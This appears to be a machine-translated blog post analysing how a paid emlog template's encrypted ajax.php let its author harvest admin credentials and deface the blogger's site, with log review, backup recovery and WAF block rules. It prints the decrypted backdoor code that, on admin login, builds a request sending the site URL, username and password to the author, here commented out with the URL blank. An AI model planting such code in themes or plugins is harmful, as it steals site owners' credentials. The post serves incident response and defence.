share your technology and add some temperature for safety

Posted by barello at 2020-03-31


When people wander in the Jianghu, they will not get hurt. Little brother, my blog was launched on the 21st. I never thought it was my daily life, but now it's miserable (sad face)

In fact, it's not terrible to get a knife. What's terrible is that he cut into my iron plate and sparked. The so-called know yourself and know the other side can win every battle. You must know how the other side took my website. If you don't analyze the reasons, the next time you are killed, you are still my younger brother.

So next, we will make a simple analysis of the whole intrusion event.

0x01 basic information of Blog

My blog system is CentOS 6, and my blog program is the CMS of emlog. The module is a paid module [fly]. To tell you the truth, this module is pretty good. When I first installed it, I scanned d-shield to see if there was a back door. Apart from several encrypted PHP files found in the scanning results, there was nothing wrong with other files, so it didn't matter. Unexpectedly, these encrypted files led to blog intrusion.

The time of being invaded is August 21. After logging in to the server, it is found that the file has been deleted and the index.php file has been tampered with. The document was revised at 18:04:15 on August 21, 2018. The black pages are as follows:

Wait a minute. Isn't that the aftermarket group I use? Is it the author of the day my site? Of course, it's the other hackers who deliberately leave the pot to the author in the future, so let's analyze the log first.

0x02 intrusion process analysis

First of all, my blog uses the control panel of pagoda, but I have made a white list for port 888. Only the springboard IP can access this port, and the SSH port has also made a white list. There is no open FTP, MySQL has no open outreach, and the cloud lock for WAF.

The first step is to log in to the cloud lock and see if there is any suspicious log around the 20th. Let's look at the log first, dial up the springboard, and then enter to log in to the cloud lock console. Then enter the [security] menu and click the path of Web log to enter.

Then download the logs before the 19th and after the 22nd

My blog also has no traffic, so the log file is relatively small, just open Notepad + +. Since the modification time of the black page seen before is 16:15:15 on August 21, 2018, the part that is directly positioned to about 18:04 on August 21 starts to see

Find the keyword [. PHP] in Notepad + +

Then go to the part after 18 o'clock.

Suspected intruder IP: check, Changsha, Hunan

Now let's take a file by file look at how he launched the attack.

0x03 make more backups to reduce losses

Because the files on the blog have been almost deleted by him. There are only some matching folders left, but fortunately, I docked with Alibaba cloud OSS. Automatically back up the whole station to Alibaba cloud OSS every 3 days.

I have to praise Alibaba cloud's OSS here. If it's just archive storage, it's very cheap. You don't need to pay for downloading backup files, just buy storage space

We log in to Alibaba cloud console and enter OSS storage.

After entering the file management, you can see that the backup files before the 19th are all more than 30 m, but after the 22nd, the backup files are only more than 10 m

So we have to download the backup file of the 19th to restore it to the blog. Click the file No. 19, enter the file to be unfrozen later, and then it will be unfrozen in about two minutes.

Then you can see the download address, download it directly and upload it to our blog, then unzip it.


We shut down the station before resuming it. First, add a white list to port 80 and port 443, and only allow our IP access, so as to avoid being given a day again before you find out the problem.

0x04 the official back door is the most lethal

The first file he visited / include / lib / checkcode.php. Let's visit the following file locally and find that it's a verification code file.

The second file / content / templates / Fly / Inc / Ajax. PHP? A = Ajax will be displayed after we visit it directly; {"code": "208"}

If the administrator is in the log in blog status, the account password and other data will be returned.

Then the problem must be on ajax.php. Let's open it. It's very powerful. It's encrypted. Thank you so much for helping us decrypt this file

Let's look up Ajax and find out that here, the account password is printed out.

A data / content / templates / Fly / Inc / Ajax. PHP? A = login found in the log

We search for login in the decrypted ajax.php to see the good guy. The official back door is terrible. When we see my comments, we have understood what it means.

After logging into the blog background, we will send the URL account password and other data to the following address of the author.

Attach code
if ($_GET['a'] == 'login') {         $username = isset($_POST['user']) ? addslashes(trim($_POST['user'])) : '';         $password = isset($_POST['pw']) ? addslashes(trim($_POST['pw'])) : '';         $ispersis = isset($_POST['ispersis']) ? intval($_POST['ispersis']) : false;         $img_code = Option::get('login_code') == 'y' && isset($_POST['imgcode']) ? addslashes(trim(strtoupper($_POST['imgcode']))) : '';         $errorCode = LoginAuth::checkUser($username, $password, $img_code);         if ($errorCode === true) {                 LoginAuth::setAuthCookie($username, $ispersis);                 $userinfo = LoginAuth::getUserDataByLogin($username);                 $json = array('code' => '200', 'data' => $userinfo);                 $tempath = @file_get_contents(EMLOG_ROOT . '/content/templates/FLY/fonts/FontAwesome.woff');                 $tempath = base64_decode($tempath);                 if ($tempath != BLOG_URL && $userinfo['role'] == 'admin') {                         #$url = '' . urlencode('盗版地址:' . BLOG_URL . '|盗版管理员账号:' . $username . '|盗版管理员密码:' . $password . '|泄露源:' . $tempath);                         #$data = @file_get_contents($url);                 }         } else {                 if ($errorCode == '-3') {                         $json = array('code' => '201', 'info' => '验证码输入有误');                 } else {                         if ($errorCode == '-1') {                                 $json = array('code' => '202', 'info' => '账号或密码错误');                         } else {                                 if ($errorCode == '-2') {                                         $json = array('code' => '203', 'info' => '账号或密码错误');                                 }                         }                 }         }         echo json_encode($json);

Let's keep looking down.

Here he uploads a module file and installs it.

Because it is not found in the log that he has visited other PHP files, there is only one possible modification to my homepage file index.php, that is, the black page has been written in the module he uploaded, and then the module has been uploaded to cover the homepage file on my website.

Then delete my module, which also proves the reason why only the module is deleted, and my article map folder is still there.

It's time for us to find the attacker

First, make sure that the author did it. I already know the IP address through the log. the inquiry is from Changsha, Hunan Province.

Yes, it's you. Just ask the author what he means.

It's very clear, because I changed my domain name after I bought it. The author thought that I stole his module from my domain name now, and then I lay down my gun. It's a fucking injury. But it's true that modules have backdoors.

Summarize the next process

1. The author wrote a back door in the / content / templates / Fly / Inc / ajax.php file. 2. After we log in to the background normally, we will automatically send your background address and account password to the author. 3. Then the author has an authorization list, which will be compared. If it is not in the authorization list, it will be marked separately. 4. Then one day, you will be deleted by the author and put up a black page

Avoid being caught in the sun

Take the protection software [cloud lock] as an example; open the cloud lock and enter the detailed settings

Enter vulnerability protection settings

Add a protection rule

Disable access to files under the / Admin background with regular. Regular expression; / Admin ([\ s \ S] *?) Note: after adding this rule, you will not be able to access the background, but you can add your IP or springboard machine to the white list. In the future, only your SpringBoard machine and your IP can access all files under / Admin.

Continue to disable Ajax = login ([\ s \ S] *?)? A = login

The following files are forbidden to access useragent_setting.phpinstall.php.locksetting.phpffunctions.php

Written in the end

Although this is an accident, but it can't change the fact that I'm standing on the day, so I made a decision to directly open your module and write a method to avoid being hit by the day. The charging module is at the end, and the reply is visible.

The back door of Ajax file has been commented out by me, and my friends can use it at ease. In addition, some encrypted files don't know what to do with them. If you are interested, you can decrypt them by yourself.